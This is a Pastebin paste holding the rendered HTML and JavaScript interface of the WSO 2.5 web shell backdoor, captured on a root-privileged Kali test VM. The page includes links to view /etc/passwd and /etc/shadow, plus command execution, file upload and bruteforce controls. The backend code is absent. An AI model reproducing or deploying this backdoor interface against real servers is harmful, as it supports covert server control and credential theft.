API tools faq
paste
Advertisement
Guest User

WSO HTML Shell

a guest
Aug 17th, 2015
784
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 8.94 KB | None | 0 0
raw download clone embed print report
  1. As can be seen from the title and screenshots, this appears to be a fully featured web backdoor known as WSO 2.5 which allows full control over the target host.
  2.  
  3.  
  4. <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title>
  5. <style>
  6. body{background-color:#444;color:#e1e1e1;}
  7. body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
  8. table.info{ color:#fff;background-color:#222; }
  9. span,h1,a{ color:  !important; }
  10. span{ font-weight: bolder; }
  11. h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
  12. div.content{ padding: 5px;margin-left:5px;background-color:#333; }
  13. a{ text-decoration:none; }
  14. a:hover{ text-decoration:underline; }
  15. .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
  16. .bigarea{ width:100%;height:300px; }
  17. input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; }
  18. form{ margin:0px; }
  19. #toolsTbl{ text-align:center; }
  20. .toolsInp{ width: 300px }
  21. .main th{text-align:left;background-color:#5e5e5e;}
  22. .main tr:hover{background-color:#5e5e5e}
  23. .l1{background-color:#444}
  24. .l2{background-color:#333}
  25. pre{font-family:Courier,Monospace;}
  26. </style>
  27. <script>
  28.     var c_ = '/media/root/pentest/web/';
  29.     var a_ = 'SecInfo'
  30.     var charset_ = '';
  31.     var p1_ = '';
  32.     var p2_ = '';
  33.     var p3_ = '';
  34.     var d = document;
  35.     function set(a,c,p1,p2,p3,charset) {
  36.         if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  37.         if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  38.         if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  39.         if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  40.         if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  41.         if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
  42.     }
  43.     function g(a,c,p1,p2,p3,charset) {
  44.         set(a,c,p1,p2,p3,charset);
  45.         d.mf.submit();
  46.     }
  47.     function a(a,c,p1,p2,p3,charset) {
  48.         set(a,c,p1,p2,p3,charset);
  49.         var params = 'ajax=true';
  50.         for(i=0;i<d.mf.elements.length;i++)
  51.             params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  52.         sr('', params);
  53.     }
  54.     function sr(url, params) {
  55.         if (window.XMLHttpRequest)
  56.             req = new XMLHttpRequest();
  57.         else if (window.ActiveXObject)
  58.             req = new ActiveXObject('Microsoft.XMLHTTP');
  59.        if (req) {
  60.            req.onreadystatechange = processReqChange;
  61.            req.open('POST', url, true);
  62.            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
  63.            req.send(params);
  64.        }
  65.     }
  66.     function processReqChange() {
  67.         if( (req.readyState == 4) )
  68.             if(req.status == 200) {
  69.                 var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
  70.                 var arr=reg.exec(req.responseText);
  71.                 eval(arr[2].substr(0, arr[1]));
  72.             } else alert('Request error!');
  73.     }
  74. </script>
  75. <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
  76. <form method=post name=mf style='display:none;'>
  77. <input type=hidden name=a>
  78. <input type=hidden name=c>
  79. <input type=hidden name=p1>
  80. <input type=hidden name=p2>
  81. <input type=hidden name=p3>
  82. <input type=hidden name=charset>
  83. </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux pentestvm 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.0.0-" target=_blank>[exploit-db.com]</a></nobr><br>0 ( root ) <span>Group:</span> 0 ( root )<br>5.6.9-0+deb8u1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2015-08-15 21:42:53<br>1863.01 GB <span>Free:</span> 721.42 GB (38%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/media/")'>media/</a><a href='#' onclick='g("FilesMan","/media/root/")'>root/</a><a href='#' onclick='g("FilesMan","/media/root/pentest/")'>pentest/</a><a href='#' onclick='g("FilesMan","/media/root/pentest/web/")'>web/</a> <font color=#25ff00>drwxrwxrwx</font> <a href=# onclick="g('FilesMan','/media/root/pentest/web','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>none<br><span>cURL support: </span>enabled<br><span>Supported databases: </span>MySql (5.5.44)<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a><br><span>OS version: </span>Linux version 4.0.0-kali1-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10) ) #1 SMP Debian 4.0.4-1+kali2 (2015-06-03)<br><span>Distr name: </span>Kali GNU/Linux 2.0<br><br><span>Userful: </span>gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate<br><span>Danger: </span>chkrootkit, iptables<br><span>Downloaders: </span>wget, curl, lwp-mirror<br><br/><span>HDD space: </span><pre class=ml1>Filesystem      Size  Used Avail Use% Mounted on
  84. udev             10M     0   10M   0% /dev
  85. tmpfs           790M   13M  778M   2% /run
  86. /dev/sda1       288G   12G  262G   5% /
  87. tmpfs           2.0G  480K  2.0G   1% /dev/shm
  88. tmpfs           5.0M     0  5.0M   0% /run/lock
  89. tmpfs           2.0G     0  2.0G   0% /sys/fs/cgroup
  90. tmpfs           395M   28K  395M   1% /run/user/0
  91. /dev/sdb1       1.9T  1.2T  722G  62% /media/root</pre><span>Hosts: </span><pre class=ml1>127.0.0.1 localhost
  92. 127.0.1.1   pentestvm.crowdshield.com   pentestvm
  93.  
  94. # The following lines are desirable for IPv6 capable hosts
  95. ::1     localhost ip6-localhost ip6-loopback
  96. ff02::1 ip6-allnodes
  97. ff02::2 ip6-allrouters</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div>
  98. </div>
  99. <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
  100.     <tr>
  101.         <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/media/root/pentest/web/'><input type=submit value='>>'></form></td>
  102.         <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  103.     </tr><tr>
  104.         <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
  105.         <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
  106.     </tr><tr>
  107.         <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
  108.         <td><form method='post' ENCTYPE='multipart/form-data'>
  109.         <input type=hidden name=a value='FilesMAn'>
  110.         <input type=hidden name=c value='/media/root/pentest/web/'>
  111.         <input type=hidden name=p1 value='uploadFile'>
  112.         <input type=hidden name=charset value=''>
  113.         <span>Upload file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
  114.     </tr></table></div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!